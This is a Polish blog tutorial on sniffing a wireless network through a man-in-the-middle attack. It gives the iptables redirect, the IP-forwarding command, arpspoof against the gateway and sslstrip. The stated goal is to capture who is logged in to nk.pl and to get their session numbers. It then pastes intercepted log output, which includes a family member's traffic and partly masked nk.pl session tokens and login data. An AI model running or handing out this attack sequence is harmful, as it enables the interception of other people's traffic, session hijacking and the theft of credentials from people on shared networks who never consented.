Sniffing/MITM w sieciach bezprzewodowych Atak Man In The Middle, podczas którego będziemy sniffowali sobie sieć i patrzyli kto jest zalogowany na nk i jaki ma numer sesji logowania.
Do dzieła.
Linuxa
Netstat (included in linux)
IPTables (included in linux)
Arpspoof (składnik dsniffa, apt-get install dsniff -y)
SSLStrip wersja 0.9.0
Być podłączonym do sieci, którą atakujesz.
Atak będzie bazował na ARP Spoofingu. Czym jest ARPSpoofing?
Pisano o tym zagadnieniu wiele razy.
Pierwsze co, by atakujący mógł podsłuchać ruch sieciowy to odpowiednio skonfigurować swój komputer jako prawie niewidoczny forwarder danych. (łatwo wykryć po dziwnych danych w pakietach TTL).
Dlatego atak jest łatwy do wykrycia.
Porty forwardujesz tak:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 |
A potem tak:
echo 1 > /proc/sys/net/ipv4/ip_forward |
Teraz zobaczmy jakie komputery w sieci są dostępne:
netstat -nr Kernel IP routing tableDestination Gateway Genmask Flags MSS Window irtt Iface 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 wlan1 192.168.0.0 0.0.0.0 255.255.0.0 U 0 0 0 wlan1 0.0.0.0 192.168.1.1 0.0.0.0 UG 0 0 0 wlan1 |
Wykonaj to polecenie by zmienić swoją bramę:
arpspoof -i wlan1 192.168.1.1 |
Uwaga! Przy dużym obciążeniu sieci ARP Spoofing może wywołać crash sieciowy, alarm u admina, odciąć niektórych userów od sieci, co da adminowi znać, że coś jest nie tak i koniec zabawy! Dziękuję dobranoc.
-Co to SSL Strip?
sslstrip -k -l 8080 |
Polecenie to znaczy tyle co:
-k więc przerwij aktywne sesje HTTPS jakie tylko zauważysz
-l 8080 przekaż dane HTTPS na port 8080, bo właśnie ten port jest ustawiony w IPTables na forwardownie.
Ze sniffowane dane będą zapisywane do pliku, ich odczytanie umożliwi Ci wykonanie tajemniczej komendy:
tail sslstrip.log |
U
mnie akurat przechwyciłem sobie sesję jak telefon sprawdza pogodę
oraz siostra ciora w gry MMO Online:
011-08-10
23:41:52,497 POST
Data
(www.google.com):"newswidget,0.0.0,android,web,en_US*g>*http://nt0.ggpht.com/news/tbn/lNqGNzS2tbAJGET>*http://nt1.ggpht.com/news/tbn/acL19pe7-1wJGET
root@Asus-PC:~# tail sslstrip.log 2011-08-10 23:41:52,497 POST Data
(www.google.com):"newswidget,0.0.0,android,web,en_US*g>*http://nt0.ggpht.com/news/tbn/lNqGNzS2tbAJGET>*http://nt1.ggpht.com/news/tbn/acL19pe7-1wJGET2011-08-10
23:42:29,822 POST Data
(www.howrse.pl):type=galop&id=3925575&course=galop2011-08-10
23:42:32,140 POST Data
(www.google.com):"newswidget,0.0.0,android,web,en_US*g,g:gne/lŪ^jK,
( 2011-08-10 23:49:18,901 POST Data
(safebrowsing.clients.google.com):goog-malware-shavar;a:35830-45829:s:48324-57676:macgoog-phish-shavar;a:143100-153828:s:73356-77030:mac2011-08-10
23:50:12,476 POST Data (api.webrep.avast.com):{"plugin":
{"type": "firefox", "version":
"20110201"}, "rules": { "version":
"110712152532999"}}
Przy
okazji dowiedziałem się, że Google Android bardzo nie dyskretnie
zbiera sobie o mnie informacje jaki soft mam
zainstalowany:
2011-08-10
23:49:18,901 POST
Data
(safebrowsing.clients.google.com):goog-malware-shavar;a:35830-45829:s:48324-57676:macgoog-phish-shavar;a:143100-153828:s:73356-77030:mac
Trzeba
będzie debiana postawić zamiast Android OS…
Zbieranie
danych do przyjemnych nie należy. Ale po jakimś czasie może
przytrafić się nam jakaś perełeczka :)
2011-08-10
23:50:32,347 POST
Data (nk.pl):t=4eXXXd344cfcXXXXXX7821812b2011-08-10 23:50:33,081 POST
Data (nk.pl):2011-08-10 23:50:33,384 POST Data
(nk.pl):MjY4OTg2NzNAbxxxXYWxrLnBsADI2ODk4NjczADRlNDMXXXXXXXXXXXXE1ZjhjYzQyMmEyMQ==2011-08-10
23:50:33,609 POST Data (nk.pl):web2011-08-10 23:50:33,917 POST Data
(nk.pl):2011-08-10 23:50:34,122 POST Data (nk.pl):2011-08-10
23:50:34,461 POST Data
(nk.pl):nktalk_login=1&t=4e4ad34XfXXXXXXX7821812b2011-08-10
23:50:34,478 POST Data (nk.pl):Koń jest bogiem, galop nałogiem.
Skoki zabawą trening podstawą :) <32011-08-10 23:50:35,063 POST
Data (nk.pl):2011-08-10 23:50:36,353 POST Data (nk.pl):2011-08-10
23:50:45,455 POST Data
(nk.pl):urls=%5B%22http%3A%2F%2Fpokazim.pl%2Fw%2Fi%2FKliknijTu38660.jpg%22%2C%22http%3A%2F%2Fpokazim.pl%2Fw%2Fi%2FKliknijTu38653.jpg%22%2C%22http%3A%2F%2Fpokazim.pl%2Fi%2FKliknijTu9.jpg%22%2C%22www.PokazIm.pl%22%5D&t=4e4ad344cxxx5d57xx21812b